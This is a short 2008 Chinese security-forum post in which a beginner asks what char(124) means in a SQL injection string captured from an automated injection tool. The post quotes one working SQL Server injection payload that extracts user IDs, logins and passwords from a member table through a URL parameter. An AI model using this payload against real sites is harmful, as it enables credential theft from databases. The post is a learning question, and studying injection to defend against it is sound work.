|
 
- 帖子
- 251
- 积分
- 667
- 威望
- 1075
- 金钱
- 829
- 在线时间
- 2 小时
|
[讨论]菜鸟问SQL注入中的小问题!
议题作者:寂寞520
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
最近想学习SQL注入,于是抓包看看前辈们的注入语句,我用WinSock Expert截取了明小子注入工具的发送代码,只看懂一部分,好头大哦!%2B我知道是+ 号,但是char(124)这种是什么意思啊?我百度没到,哪位大大帮忙给菜鸟解释下好吗?
info.aspx?id=111 And char(124)%2B(Select Top 1 isNull(cast([USERID] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Loging] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([PASS] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 2 [USERID],[Loging],[PASS] From [Lily]..[member] Where 1=1 Order by [USERID],[Loging],[PASS]) T Order by [USERID] desc,[Loging] desc,[PASS] desc)>0
帖子1 精华0 积分1 阅读权限40 在线时间0 小时 注册时间2008-3-30 最后登录2008-4-6 查看详细资料引用 报告 回复 TOP 少女暴富的隐秘(图)
trace 
晶莹剔透§烈日灼然 |
|
发表于 2008-7-21 00:11
| 